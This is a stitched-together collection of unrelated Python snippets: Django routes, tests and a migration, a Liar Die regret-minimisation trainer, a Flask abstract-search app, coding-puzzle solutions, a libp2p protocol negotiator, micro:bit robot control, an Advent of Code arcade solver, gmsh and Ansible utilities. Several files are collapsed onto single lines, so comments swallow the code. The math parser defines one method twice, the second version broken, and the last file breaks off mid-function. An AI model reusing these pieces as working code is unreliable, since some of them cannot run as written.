# SimpleRouter generates the standard list/detail routes for the viewset
# under the "posts" prefix (basename "posts").
router = SimpleRouter()
router.register("posts", views.PostViewSet, "posts")

urlpatterns = [
    path('upload_file/', views.FileUploadView.as_view()),
]
# Append the router-generated routes after the explicit ones.
urlpatterns += router.urls
python
import getpass

# Greeting addressed to whoever is currently logged in.
message = f"hello {getpass.getuser()}"
python
from django.core.urlresolvers import resolve
from django.urls import reverse
from django.template.loader import render_to_string
from django.test import TestCase
from django.http import HttpRequest
from unittest import skip

from users.views import home_visitor, display_signup
from users.models import University, Faculty, Department
from users.forms import SignupForm, UserSignUpForm
from django.contrib.auth.models import User


class signup_form_test(TestCase):
    """Validation tests for UserSignUpForm: username rules (length, Arabic
    support) and password rules (match, strength, non-numeric)."""

    def test_user_submits_valid_form(self):
        # Setup test
        u = User()
        u.username = 'waaaaeeel'
        u.email = '[email protected]'
        data = {'username':u.username, 'email':u.email, 'password':'12345678abc', 'password_confirm':'12345678abc'}
        # Exercise test
        form = UserSignUpForm(data=data)
        # Assert test
        self.assertTrue(form.is_valid())

    def test_users_submits_invalid_username(self):
        # Setup test: username too short / digits only should be rejected.
        u = User()
        u.username = '123'
        u.email = '[email protected]'
        data = {'username':u.username, 'email':u.email, 'password':'12345678abc', 'password_confirm':'12345678abc'}
        # Exercise test
        form = UserSignUpForm(data=data)
        # Assert test
        self.assertFalse(form.is_valid())

    def test_users_submits_arabic_username(self):
        # Setup test: plain Arabic usernames must be accepted.
        u = User()
        u.username = 'فارس'
        u.email = '[email protected]'
        data = {'username':u.username, 'email':u.email, 'password':'12345678abc', 'password_confirm':'12345678abc'}
        # Exercise test
        form = UserSignUpForm(data=data)
        # Assert test
        self.assertTrue(form.is_valid())

    def test_users_submits_arabic_username_with_extended_letters(self):
        # Setup test: Arabic with underscore and extended letters.
        u = User()
        u.username = 'فارس_الإسلام'
        u.email = '[email protected]'
        data = {'username':u.username, 'email':u.email, 'password':'12345678abc', 'password_confirm':'12345678abc'}
        # Exercise test
        form = UserSignUpForm(data=data)
        # Assert test
        # NOTE(review): leftover debug output — prints errors on every run.
        print(form.errors)
        self.assertTrue(form.is_valid())

    def test_users_submits_unmatched_password(self):
        # Setup test: password and confirmation differ.
        u = User()
        u.username = 'iige13'
        u.email = '[email protected]'
        data = {'username':u.username, 'email':u.email, 'password':'12345678abc', 'password_confirm':'12345678bca'}
        # Exercise test
        form = UserSignUpForm(data=data)
        # Assert test
        self.assertFalse(form.is_valid())

    # Causes keyError exception because of the front-end validation that password should be 7 digits.
    def test_password_strength(self):
        # Setup test: 3-character password must be rejected.
        u = User()
        u.username = 'ibham'
        u.email = '[email protected]'
        data = {'username':u.username, 'email':u.email, 'password':'555', 'password_confirm':'555'}
        # Exercise test
        form = UserSignUpForm(data=data)
        # Assert test
        self.assertFalse(form.is_valid())

    def test_password_with_only_digits(self):
        # Setup test: all-numeric password must be rejected.
        u = User()
        u.username = 'ibham'
        u.email = '[email protected]'
        data = {'username':u.username, 'email':u.email, 'password':'12345678', 'password_confirm':'12345678'}
        # Exercise test
        form = UserSignUpForm(data=data)
        # Assert test
        self.assertFalse(form.is_valid())
python
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
'''
@File    :   LiarDie.py
@Time    :   2021/11/15 00:08:33
@Author  :   yanxinyi
@Version :   v1.0
@Contact :   [email protected]
@Desc    :   Applying algorithm of Fixed-Strategy Iteration Counterfactual
             Regret Minimization (FSICFR) to Liar Die.
java code structure:
    class Node {
        <Liar Die node definitions>
        <Liar Die node constructor>
        <Get Liar Die node current mixed strategy through regret-matching>
        <Get Liar Die node average mixed strategy>
    }
    public void train(int iterations) {
        double[] regret = new double[sides];
        int[] rollAfterAcceptingClaim = new int[sides];
        for (int iter = 0; iter < iterations; iter++) {
            <Initialize rolls and starting probabilities>
            <Accumulate realization weights forward>
            <Backpropagate utilities, adjusting regrets and strategies>
            <Reset strategy sums after half of training>
        }
        <Print resulting strategy>
    }
    public class LiarDieTrainer {
        <Liar Die definitions>
        <Liar Die player decision node>
        <Construct trainer and allocate player decision nodes>
        <Train with FSICFR>
        <LiarDieTrainer main method>
    }
'''

import random


class Node(object):
    '''Liar Die player decision node'''

    def __init__(self, numActions, *args, **kwargs):
        '''Liar Die node definitions'''
        # Per-action accumulators for regret matching.
        self.regretSum = [0] * numActions
        self.strategy = [0] * numActions
        self.strategySum = [0] * numActions
        # Node utility and the two players' realization weights.
        self.u = 0
        self.pPlayer = 0
        self.pOpponent = 0

    def getStrategy(self):
        '''Get Liar Die node current mixed strategy through regret-matching'''
        normalizingSum = 0
        for i in range(len(self.strategy)):
            self.strategy[i] = max(self.regretSum[i], 0)
            normalizingSum += self.strategy[i]
        for i in range(len(self.strategy)):
            if normalizingSum > 0:
                self.strategy[i] /= normalizingSum
            else:
                # No positive regret anywhere: fall back to uniform play.
                self.strategy[i] = 1/len(self.strategy)
        for i in range(len(self.strategy)):
            # Weight the running average by the player's reach probability.
            self.strategySum[i] += self.pPlayer * self.strategy[i]
        return self.strategy

    def getAverageStrategy(self):
        '''Get Liar Die node average mixed strategy'''
        # NOTE(review): normalizes strategySum in place, so calling this twice
        # re-normalizes already-normalized values.
        normalizingSum = 0
        for i in range(len(self.strategySum)):
            normalizingSum += self.strategySum[i]
        for i in range(len(self.strategySum)):
            if normalizingSum > 0:
                self.strategySum[i] /= normalizingSum
            else:
                self.strategySum[i] = 1 / len(self.strategySum)
        return self.strategySum


class LDTrainer(object):

    def __init__(self, seed=None, sides=6, *args, **kwargs):
        random.seed(seed)
        '''Liar Die definitions'''
        # Action indices for a response node.
        self.DOUBT = 0
        self.ACCEPT = 1
        # Construct trainer and allocate player decision nodes.
        # responseNodes[myClaim][oppClaim]: respond to opponent's raise.
        # claimNodes[oppClaim][roll]: make a new claim after accepting + rolling.
        self.sides = sides
        self.responseNodes = [[0]*(self.sides + 1) for _ in range(self.sides)]
        self.claimNodes = [[0]*(self.sides + 1) for _ in range(self.sides)]
        for myClaim in range(self.sides + 1):
            for oppClaim in range(myClaim + 1, self.sides + 1):
                # Claiming the maximum leaves only DOUBT as a legal response.
                self.responseNodes[myClaim][oppClaim] = \
                    Node(1 if (oppClaim == 0 or oppClaim == self.sides) else 2)
        for oppClaim in range(self.sides):
            for roll in range(1, self.sides + 1):
                self.claimNodes[oppClaim][roll] = Node(self.sides - oppClaim)

    def train(self, iterations):
        '''Train with FSICFR'''
        regret = [0] * self.sides
        rollAfterAcceptingClaim = [0] * self.sides
        for iter in range(iterations):
            # Initialize rolls and starting probabilities
            for i in range(len(rollAfterAcceptingClaim)):
                rollAfterAcceptingClaim[i] = random.randint(0, self.sides - 1) + 1
            self.claimNodes[0][rollAfterAcceptingClaim[0]].pPlayer = 1
            self.claimNodes[0][rollAfterAcceptingClaim[0]].pOpponent = 1

            # Accumulate realization weights forward
            for oppClaim in range(0, self.sides + 1):
                # Visit response Nodes forward
                if oppClaim > 0:
                    for myClaim in range(0, oppClaim):
                        node = self.responseNodes[myClaim][oppClaim]
                        actionProb = node.getStrategy()
                        if oppClaim < self.sides:
                            nextNode = self.claimNodes[oppClaim][rollAfterAcceptingClaim[oppClaim]]
                            nextNode.pPlayer += actionProb[1] * node.pPlayer
                            nextNode.pOpponent += node.pOpponent
                # Visit claim nodes forward
                if oppClaim < self.sides:
                    node = self.claimNodes[oppClaim][rollAfterAcceptingClaim[oppClaim]]
                    actionProb = node.getStrategy()
                    for myClaim in range(oppClaim + 1, self.sides + 1):
                        nextClaimProb = actionProb[myClaim - oppClaim - 1]
                        if nextClaimProb > 0:
                            # Roles swap between successive nodes: the claimer's
                            # reach feeds the responder's opponent weight.
                            nextNode = self.responseNodes[oppClaim][myClaim]
                            nextNode.pPlayer += node.pOpponent
                            nextNode.pOpponent += nextClaimProb * node.pPlayer

            # Backpropagate utilities, adjusting regrets and strategies
            for oppClaim in range(self.sides, -1, -1):
                # Visit claim nodes backward
                if oppClaim < self.sides:
                    node = self.claimNodes[oppClaim][rollAfterAcceptingClaim[oppClaim]]
                    actionProb = node.strategy
                    node.u = 0
                    for myClaim in range(oppClaim + 1, self.sides + 1):
                        actionIndex = myClaim - oppClaim - 1
                        nextNode = self.responseNodes[oppClaim][myClaim]
                        # Zero-sum: child's utility is negated for this player.
                        childUtil = - nextNode.u
                        regret[actionIndex] = childUtil
                        node.u += actionProb[actionIndex] * childUtil
                    for a in range(len(actionProb)):
                        regret[a] -= node.u
                        node.regretSum[a] += node.pOpponent * regret[a]
                    node.pPlayer = node.pOpponent = 0
                # Visit response nodes backward
                if oppClaim > 0:
                    for myClaim in range(0, oppClaim):
                        node = self.responseNodes[myClaim][oppClaim]
                        actionProb = node.strategy
                        node.u = 0
                        doubtUtil = 1 if (oppClaim > rollAfterAcceptingClaim[myClaim]) else -1
                        regret[self.DOUBT] = doubtUtil
                        # NOTE(review): node.u never adds the DOUBT term
                        # (actionProb[DOUBT] * doubtUtil); the canonical FSICFR
                        # listing includes it — verify against the reference.
                        if oppClaim < self.sides:
                            nextNode = self.claimNodes[oppClaim][rollAfterAcceptingClaim[oppClaim]]
                            regret[self.ACCEPT] = nextNode.u
                            node.u += actionProb[self.ACCEPT] * nextNode.u
                        for a in range(len(actionProb)):
                            regret[a] -= node.u
                            node.regretSum[a] += node.pOpponent * regret[a]
                        node.pPlayer = node.pOpponent = 0

            # Reset strategy sums after half of training
            # (discards the noisy early average; float compare works because
            # range() yields ints and iterations/2 is x.0 for even iterations)
            if iter == iterations / 2:
                for nodes in self.responseNodes:
                    for node in nodes:
                        if node:
                            for a in range(len(node.strategySum)):
                                node.strategySum[a] = 0
                for nodes in self.claimNodes:
                    for node in nodes:
                        if node:
                            for a in range(len(node.strategySum)):
                                node.strategySum[a] = 0

        # Print resulting strategy
        for initialRoll in range(1, self.sides + 1):
            print("Initial claim policy with roll {0:d}: ".format(initialRoll), end = '')
            for prob in self.claimNodes[0][initialRoll].getAverageStrategy():
                print('{0:.2f} '.format(prob), end = '')
            print('')
        print('\nOld_Claim\tNew_Claim\tAction_Probabilities')
        for myClaim in range(0, self.sides + 1):
            for oppClaim in range(myClaim + 1, self.sides + 1):
                print('{0:d}\t{1:d}\t'.format(myClaim, oppClaim) + \
                    str([float('%.4g' % float('%.3f' % x)) for x in \
                    self.responseNodes[myClaim][oppClaim].getAverageStrategy()]))
        print('\nOld_Claim\tRoll\tAction_Probabilities')
        for oppClaim in range(0, self.sides):
            for roll in range(1, self.sides + 1):
                print('{0:d}\t{1:d}\t'.format(oppClaim, roll) + \
                    str([float('%.3g' % float('%.2f' % x)) for x in \
                    self.claimNodes[oppClaim][roll].getAverageStrategy()]))
                # print('regrets', self.claimNodes[oppClaim][roll].regretSum)


if __name__ == "__main__":
    LD = LDTrainer(seed=1, sides=6)
    LD.train(iterations = 10000)
python
import numpy as np
import pandas as pd
import pickle
from sklearn.neighbors import NearestNeighbors
from flask import Flask, render_template, request, redirect, jsonify

"""
To run on windows with powershell:
1. Navigate to the directory where apsapp.py is located.
2. Enter: $env:FLASK_APP = "apsapp.py"
3. Enter: python -m flask run
4. Open browser and go to specififed url (probably http://127.0.0.1:5000/)
"""

# ===================================================
# Load required files.
# ===================================================
vectorizerFile = "tfidf_test.pickle"  #This file holds the vectorizer
eventsFile = "events_test.pickle"  #This file holds a dataframe of events
nnFile = "nearestneighbors_test.pickle"  #This file holds a the nearest neighbor information
tMatrixFile = "T_test.pckle"  #holds the T matrix from the SVD
nnSVDFile = "nearestneighborsSVD_test.pickle"  #holds the NN map of the D matrix from the SVD

with open(vectorizerFile, 'rb') as f:
    v = pickle.load(f)
with open(eventsFile, 'rb') as f:
    events = pickle.load(f)
with open(nnFile, 'rb') as f:
    nn = pickle.load(f)
with open(tMatrixFile, 'rb') as f:
    T = pickle.load(f)
with open(nnSVDFile, 'rb') as f:
    nnSVD = pickle.load(f)


#Converts an event index to a dictionary with four entries:
#  title -> The title of the abstract
#  abstract -> A shortened version of the abstract
#  link -> URL of the event
#  score -> Relative score of the event
def index_to_event(index, score,abstractLength=100):
    """Get an event associated with a given index."""
    e = events.iloc[index]
    session = e['session']
    event = e['event']
    year = e['year']
    return {
        'session' : session,
        'event' : str(event),
        'title': e['title'],
        'abstract': e['abstract'][:abstractLength]+"...",  # preview only
        'score': str(score),
        # Deep link into the APS March Meeting program for that year.
        'link': f'https://meetings.aps.org/Meeting/MAR{year[-2:]}'
                f'/Session/{session}.{event}'
    }


def castQueryIntoTruncatedSubspace(matrix, T):
    """
    An existing SVD can be applied to a new query be performing
        q' = T'^T q
    where q' and T' are truncated matrcies and q is a on column document term matrix.
    Input: document is a dense(?) numerical matrix
           T is numerical matricies.
    returns a one column vector .
    """
    return np.dot(np.transpose(T),np.transpose(matrix))


# ===================================================
# Define the app
# ===================================================
app = Flask(__name__)


# Front page for the site; simply render the submission form
@app.route('/')
def home():
    return render_template('index.html')


# Show search results
@app.route('/process', methods=['POST'])
def results():
    #Get the body (JSON when posted programmatically, form field otherwise)
    body = request.json if request.json else request.form['abstr']

    #Number of requested results
    num_results = 25

    #Project the text onto the vector space
    input=v.transform([body])
    truncatedInput = np.transpose(castQueryIntoTruncatedSubspace(input.todense(), T))

    #Get the results (cosine-style: score shown as 1 - distance)
    (distSVD,indicesSVD)=nnSVD.kneighbors(truncatedInput, n_neighbors=num_results, return_distance=True)
    resultsSVD = []
    for i, d in zip(indicesSVD[0], distSVD[0]):
        resultsSVD.append(index_to_event(i, round(1-d,3)))

    return render_template('results.html', resultsSVD=resultsSVD,
                           num_resultsSVD=num_results)


if __name__ == '__main__':
    app.run()
python
class RLEIterator:
    """Iterator over a run-length encoded sequence (LeetCode 900).

    A is a run-length encoding: A[2*i] is the repeat count of the value
    A[2*i + 1].  next(n) exhausts the next n elements and returns the
    last one exhausted, or -1 if fewer than n elements remain.

    The original skeleton had empty method bodies (a syntax error) and
    referenced an unimported `List`; this is a working implementation
    with the same public interface.
    """

    def __init__(self, A: list) -> None:
        self._encoding = A  # remaining runs, consumed in place
        self._pos = 0       # index of the current run's repeat count

    def next(self, n: int) -> int:
        """Consume n elements and return the last one, or -1 at the end."""
        while self._pos < len(self._encoding):
            count = self._encoding[self._pos]
            if n > count:
                # This whole run is exhausted; move on to the next run.
                n -= count
                self._encoding[self._pos] = 0
                self._pos += 2
            else:
                # The n-th consumed element lies inside this run.
                self._encoding[self._pos] -= n
                return self._encoding[self._pos + 1]
        return -1  # ran off the end of the sequence


# Your RLEIterator object will be instantiated and called as such:
# obj = RLEIterator(A)
# param_1 = obj.next(n)
python
# Open-chat problem (KAKAO 2019): replay the record, map each uid to its
# latest nickname, then rebuild the enter/leave messages.
# (The previous version crashed on "Leave <uid>" lines -- they carry only
# two tokens, so the unconditional 3-way unpack raised ValueError -- and
# always returned an empty answer.)

import collections


def solution(record):
    """Return chat messages with every uid resolved to its final nickname.

    record entries are "Enter <uid> <name>", "Change <uid> <name>" or
    "Leave <uid>"; Leave lines have no name token.
    """
    names = collections.defaultdict(str)  # uid -> latest nickname
    events = []                           # (action, uid) in arrival order

    for rec in record:
        parts = rec.split(' ')
        action, uid = parts[0], parts[1]
        # Only Enter/Change carry a nickname; Leave has just two tokens.
        if len(parts) == 3:
            names[uid] = parts[2]
        # Change produces no visible message.
        if action != 'Change':
            events.append((action, uid))

    templates = {'Enter': '%s님이 들어왔습니다.', 'Leave': '%s님이 나갔습니다.'}
    return [templates[action] % names[uid] for action, uid in events]


answer = solution(["Enter uid1234 Muzi", "Enter uid4567 Prodo", "Leave uid1234",
                   "Enter uid1234 Prodo", "Change uid4567 Ryan"])
print(answer)
python
from typing import Dict, Tuple

from libp2p.typing import StreamHandlerFn, TProtocol

from .exceptions import MultiselectCommunicatorError, MultiselectError
from .multiselect_communicator_interface import IMultiselectCommunicator
from .multiselect_muxer_interface import IMultiselectMuxer

# Protocol ID both sides must exchange verbatim during the handshake.
MULTISELECT_PROTOCOL_ID = "/multistream/1.0.0"
# Reply sent when the requested protocol has no registered handler.
PROTOCOL_NOT_FOUND_MSG = "na"


class Multiselect(IMultiselectMuxer):
    """
    Multiselect module that is responsible for responding to
    a multiselect client and deciding on
    a specific protocol and handler pair to use for communication
    """

    # Registered protocol -> stream handler mapping.
    handlers: Dict[TProtocol, StreamHandlerFn]

    def __init__(
        self, default_handlers: Dict[TProtocol, StreamHandlerFn] = None
    ) -> None:
        # A falsy default is replaced with a fresh dict per instance, so
        # instances never share handler state.
        if not default_handlers:
            default_handlers = {}
        self.handlers = default_handlers

    def add_handler(self, protocol: TProtocol, handler: StreamHandlerFn) -> None:
        """
        Store the handler with the given protocol
        :param protocol: protocol name
        :param handler: handler function
        """
        self.handlers[protocol] = handler

    async def negotiate(
        self, communicator: IMultiselectCommunicator
    ) -> Tuple[TProtocol, StreamHandlerFn]:
        """
        Negotiate performs protocol selection
        :param stream: stream to negotiate on
        :return: selected protocol name, handler function
        :raise MultiselectError: raised when negotiation failed
        """
        await self.handshake(communicator)

        # Serve client commands until a protocol is agreed on.
        while True:
            try:
                command = await communicator.read()
            except MultiselectCommunicatorError as error:
                raise MultiselectError(error)

            if command == "ls":
                # TODO: handle ls command
                pass
            else:
                protocol = TProtocol(command)
                if protocol in self.handlers:
                    # Echo the protocol name back to confirm the selection.
                    try:
                        await communicator.write(protocol)
                    except MultiselectCommunicatorError as error:
                        raise MultiselectError(error)

                    return protocol, self.handlers[protocol]
                # Unknown protocol: answer "na" and keep listening.
                try:
                    await communicator.write(PROTOCOL_NOT_FOUND_MSG)
                except MultiselectCommunicatorError as error:
                    raise MultiselectError(error)

    async def handshake(self, communicator: IMultiselectCommunicator) -> None:
        """
        Perform handshake to agree on multiselect protocol
        :param communicator: communicator to use
        :raise MultiselectError: raised when handshake failed
        """
        # Send our protocol ID, then require the peer to echo it back.
        try:
            await communicator.write(MULTISELECT_PROTOCOL_ID)
        except MultiselectCommunicatorError as error:
            raise MultiselectError(error)

        try:
            handshake_contents = await communicator.read()
        except MultiselectCommunicatorError as error:
            raise MultiselectError(error)

        if not is_valid_handshake(handshake_contents):
            raise MultiselectError(
                "multiselect protocol ID mismatch: "
                f"received handshake_contents={handshake_contents}"
            )


def is_valid_handshake(handshake_contents: str) -> bool:
    """
    Determine if handshake is valid and should be confirmed
    :param handshake_contents: contents of handshake message
    :return: true if handshake is complete, false otherwise
    """
    return handshake_contents == MULTISELECT_PROTOCOL_ID
python
# bbc micro:bit + bit:commander (4tronix) # use joystick to command robot kitronik :move from microbit import * import radio # setup radio.on() #radio.config(group=0) s_forward, s_right = 0, 0 # main loop while True: # read joystick and scale it # -100 is full reverse forward / 0 is stop / +100% is full forward forward = round(200 * pin2.read_analog()/1023) - 100 right = round(200 * pin1.read_analog()/1023) - 100 # add a cutoff if abs(forward) < 20: forward = 0 if abs(right) < 20: right = 0 # send values on change if (s_forward, s_right) != (forward, right): (s_forward, s_right) = (forward, right) print("forward=%s right=%s" % (forward, right)) radio.send("%i,%i" % (forward, right)) # red button send stop command if pin12.read_digital(): radio.send("0,0") sleep(50)
python
# Generated by Django 3.2 on 2021-05-19 04:25 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('Sentiment', '0003_auto_20210517_1332'), ] operations = [ migrations.CreateModel( name='CSVResult', fields=[ ('id', models.AutoField(primary_key=True, serialize=False)), ('dataframe', models.JSONField()), ('name', models.CharField(max_length=500)), ('file_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='Sentiment.document')), ], ), ]
python
from collections import defaultdict

from aocd import data

from p09 import Boost


class Cabinet(Boost):
    """Intcode arcade cabinet (Advent of Code 2019, day 13).

    Extends the day-9 Boost interpreter: outputs arrive as triples
    (x, y, tile) that paint the screen, the special pair x == -1, y == 0
    carries the score, and input requests (opcode 3) are answered by
    steering the paddle toward the ball.
    """

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.screen = defaultdict(int)  # (x, y) -> tile id
        self.x = None                   # pending output: x coordinate
        self.y = None                   # pending output: y coordinate
        self.score = None
        self.ball_x = 0                 # last seen ball column
        self.paddle_x = 0               # last seen paddle column

    def execute(self):
        """Run the program until halt (opcode 99)."""
        while (code := self._get_op_code()).value != 99:
            arg1, arg2, arg3 = self._get_args(code)
            op = self._get_op(code.op)
            if code.op == 3:
                # Input: joystick follows the ball (-1 left, +1 right, 0 stay).
                if self.paddle_x < self.ball_x:
                    op(arg1, 1)
                elif self.paddle_x > self.ball_x:
                    op(arg1, -1)
                else:
                    op(arg1, 0)
            elif code.op == 4:
                # Output: collect x, then y, then the tile id (or score).
                self.pointer += 2
                if self.x is None:
                    self.x = arg1.value
                elif self.y is None:
                    self.y = arg1.value
                else:
                    if self.x == -1 and self.y == 0:
                        # (-1, 0) is the score channel, not a screen tile.
                        self.score = arg1.value
                    else:
                        point = (self.x, self.y)
                        self.screen[point] = arg1.value
                        # Tile 4 is the ball, tile 3 the paddle; remember
                        # their columns for the joystick logic above.
                        if arg1.value == 4:
                            self.ball_x = self.x
                        elif arg1.value == 3:
                            self.paddle_x = self.x
                    self.x = None
                    self.y = None
            else:
                op(arg1, arg2, arg3, None)


if __name__ == '__main__':
    program = [code for code in data.split(',')] + ['0']*10000
    cabinet = Cabinet(program)
    cabinet.execute()
    # Tile id 2 is a block.
    block_tiles = sum(tile == 2 for tile in cabinet.screen.values())
    print('Part 1:', block_tiles)

    # infinite money cheat code: address 0 set to 2 enables free play
    program[0] = '2'
    cabinet = Cabinet(program)
    cabinet.execute()
    print('Part 2:', cabinet.score)
python
# DNA nucleotide -> RNA complement lookup table.
rna_trans = {'G': 'C', 'C': 'G', 'T': 'A', 'A': 'U'}


def to_rna(dna):
    """Transcribe a DNA strand into its RNA complement.

    Returns the empty string if the strand contains any invalid
    nucleotide.
    """
    complements = []
    for nucleotide in dna:
        complement = rna_trans.get(nucleotide)
        if complement is None:
            return ''
        complements.append(complement)
    return ''.join(complements)
python
#!/usr/bin/env python2.7

"""Facilitates the measurement of current network bandwidth."""

import collections


class Bandwidth(object):
    """Tracks the latest bandwidth estimate and its recent trend."""

    def __init__(self):
        self._current = 0
        self._previous = 0
        # Rolling window of the last 100 up/flat/down movements.
        self._trend = collections.deque(maxlen=100)

    def change(self, bandwidth):
        """
        Change the current bandwidth estimation.

        Also records a bandwidth trend (1 for increasing, 0 for the same
        and -1 for decreasing).
        """
        self._previous, self._current = self._current, bandwidth
        movement = (1 if self._current > self._previous
                    else -1 if self._current < self._previous
                    else 0)
        self._trend.append(movement)

    def historical_trend(self):
        """Return the historical trend in bandwidth."""
        return list(self._trend)

    def __str__(self):
        """Returns the current estimated bandwidth."""
        return str(self._current)

    def __int__(self):
        """Returns the current estimated bandwidth."""
        return int(self._current)
python
import gmsh

# Initialise gmsh and echo messages to the terminal.
gmsh.initialize()
gmsh.option.setNumber("General.Terminal", 1)

gfile = "03032015J_H2-HR.brep"

# Import the BREP geometry; returns (dim, tag) pairs for the new shapes.
volumes = gmsh.model.occ.importShapes(gfile)
gmsh.model.occ.synchronize()
print(volumes)

# Tag volume 1 as the physical group "Cu".
pgrp = gmsh.model.addPhysicalGroup(3, [1])
# BUG FIX: the group was created with dimension 3, so its name must also
# be set with dimension 3 (it was previously set for dimension 2, which
# left the volume group unnamed).
gmsh.model.setPhysicalName(3, pgrp, "Cu")

"""
gmsh.model.mesh.setSize(gmsh.model.getEntities(0), 2)
gmsh.option.setNumber("Mesh.Algorithm", 5)
gmsh.model.mesh.generate(3)
gmsh.write("test.msh")
"""

gmsh.finalize()
python
from __future__ import division import re from math import sqrt, sin, cos, log, tan, acos, asin, atan, e, pi from operator import truediv as div from operator import add, sub, mul, pow from .numbers import NumberService class MathService(object): __constants__ = { 'e': e, 'E': e, 'EE': e, 'pi': pi, 'pie': pi } __unaryOperators__ = { 'log': log, 'sine': sin, 'sin': sin, 'cosine': cos, 'cos': cos, 'tan': tan, 'tangent': tan, 'arcsine': asin, 'arcsin': asin, 'asin': asin, 'arccosine': acos, 'arccos': acos, 'acos': acos, 'arctanget': atan, 'arctan': atan, 'atan': atan, 'sqrt': sqrt } __binaryOperators__ = { 'plus': add, 'add': add, 'sum': add, 'minus': sub, 'sub': sub, 'subtract': sub, 'less': sub, 'over': div, 'divide': div, 'times': mul, 'multiply': mul, 'to': pow } @staticmethod def _applyBinary(a, b, op): a = float(a) b = float(b) return op(a, b) @staticmethod def _applyUnary(a, op): a = float(a) return op(a) @staticmethod def _preprocess(inp): """Revise wording to match canonical and expected forms.""" inp = re.sub(r'(\b)a(\b)', r'\g<1>one\g<2>', inp) inp = re.sub(r'to the (.*) power', r'to \g<1>', inp) inp = re.sub(r'to the (.*?)(\b)', r'to \g<1>\g<2>', inp) inp = re.sub(r'log of', r'log', inp) inp = re.sub(r'(square )?root( of)?', r'sqrt', inp) inp = re.sub(r'squared', r'to two', inp) inp = re.sub(r'cubed', r'to three', inp) inp = re.sub(r'divided?( by)?', r'divide', inp) inp = re.sub(r'(\b)over(\b)', r'\g<1>divide\g<2>', inp) inp = re.sub(r'(\b)EE(\b)', r'\g<1>e\g<2>', inp) inp = re.sub(r'(\b)E(\b)', r'\g<1>e\g<2>', inp) inp = re.sub(r'(\b)pie(\b)', r'\g<1>pi\g<2>', inp) inp = re.sub(r'(\b)PI(\b)', r'\g<1>pi\g<2>', inp) def findImplicitMultiplications(inp): """Replace omitted 'times' references.""" def findConstantMultiplications(inp): split = inp.split(' ') revision = "" converter = NumberService() for i, w in enumerate(split): if i > 0 and w in MathService.__constants__: if converter.isValid(split[i - 1]): revision += " times" if not revision: revision = w 
else: revision += " " + w return revision def findUnaryMultiplications(inp): split = inp.split(' ') revision = "" for i, w in enumerate(split): if i > 0 and w in MathService.__unaryOperators__: last_op = split[i - 1] binary = last_op in MathService.__binaryOperators__ unary = last_op in MathService.__unaryOperators__ if last_op and not (binary or unary): revision += " times" if not revision: revision = w else: revision += " " + w return revision return findUnaryMultiplications(findConstantMultiplications(inp)) return findImplicitMultiplications(inp) @staticmethod def _calculate(numbers, symbols): """Calculates a final value given a set of numbers and symbols.""" if len(numbers) is 1: return numbers[0] precedence = [[pow], [mul, div], [add, sub]] # Find most important operation for op_group in precedence: for i, op in enumerate(symbols): if op in op_group: # Apply operation a = numbers[i] b = numbers[i + 1] result = MathService._applyBinary(a, b, op) new_numbers = numbers[:i] + [result] + numbers[i + 2:] new_symbols = symbols[:i] + symbols[i + 1:] return MathService._calculate(new_numbers, new_symbols) def parseEquation(self, inp): """Solves the equation specified by the input string. Args: inp (str): An equation, specified in words, containing some combination of numbers, binary, and unary operations. Returns: The floating-point result of carrying out the computation. 
""" inp = MathService._preprocess(inp) split = inp.split(' ') # Recursive call on unary operators for i, w in enumerate(split): if w in self.__unaryOperators__: op = self.__unaryOperators__[w] # Split equation into halves eq1 = ' '.join(split[:i]) eq2 = ' '.join(split[i + 1:]) # Calculate second half result = MathService._applyUnary(self.parseEquation(eq2), op) return self.parseEquation(eq1 + " " + str(result)) def extractNumbersAndSymbols(inp): numbers = [] symbols = [] # Divide into values (numbers), operators (symbols) next_number = "" for w in inp.split(' '): if w in self.__binaryOperators__: symbols.append(self.__binaryOperators__[w]) if next_number: numbers.append(next_number) next_number = "" else: if next_number: next_number += " " next_number += w if next_number: numbers.append(next_number) # Cast numbers from words to integers def convert(n): if n in self.__constants__: return self.__constants__[n] converter = NumberService() return converter.parse(n) numbers = [convert(n) for n in numbers] return numbers, symbols numbers, symbols = extractNumbersAndSymbols(inp) return MathService._calculate(numbers, symbols) def parseEquation(self, inp): """Solves the equation specified by the input string. This is a convenience method which would only be used if you'd rather not initialize a NumberService object. Args: inp (str): An equation, specified in words, containing some combination of numbers, binary, and unary operations. Returns: The floating-point result of carrying out the computation. """ service = NumberService() return service.parseEquation(inp)
python
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type

import subprocess
import sys
import ipaddress

from ansible.errors import AnsibleFilterError
from ansible.module_utils.common.process import get_bin_path
from ansible.module_utils._text import to_text
from ansible.module_utils.six import next

try:
    HAS_HUMANFRIENDLY = True
    import humanfriendly
except ImportError:
    HAS_HUMANFRIENDLY = False

PY2 = sys.version_info[0] == 2


def _decode(value):
    # bytes -> str on Python 3; pass-through on Python 2.
    return value if PY2 else value.decode()


def _encode(value):
    # str -> bytes on Python 3; pass-through on Python 2.
    return value if PY2 else value.encode()


def parse_size(user_input, binary=False):
    '''https://github.com/xolox/python-humanfriendly'''
    # Parse a human-readable size string ("5 GB") into a byte count.
    if not HAS_HUMANFRIENDLY:
        raise AnsibleFilterError("humanfriendly needs to be installed")
    return humanfriendly.parse_size(user_input, binary=binary)


def transpile_ignition_config(ignition_config):
    '''https://github.com/coreos/container-linux-config-transpiler'''
    # Pipe the config through the `ct` binary and return its stdout.
    try:
        bin_path = get_bin_path("ct", required=True, opt_dirs=None)
    except ValueError as e:
        # NOTE(review): `e.message` is Python 2 only; on Python 3 this
        # line itself raises AttributeError -- confirm intended runtime.
        raise AnsibleFilterError("ct needs to be installed: %s" % e.message)

    process = subprocess.Popen(["ct"], stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
    out, err = process.communicate(input=_encode(ignition_config))
    return_code = process.returncode
    if return_code != 0:
        raise AnsibleFilterError("transpilation failed with return code %d: %s (%s)" % (return_code, out, err))
    return _decode(out.strip())


def _extract_asn(tags):
    # Pull the ASN out of the machine's primary-network tag, if present
    # (the last matching tag wins).
    asn = None
    for tag in tags:
        if tag.startswith('machine.metal-stack.io/network.primary.asn='):
            asn = tag.split('=')[1]
    return asn


def _generate_node_selectors(host):
    # Build a MetalLB node selector matching exactly this hostname.
    match_expression = dict()
    match_expression['key'] = 'kubernetes.io/hostname'
    match_expression['operator'] = 'In'
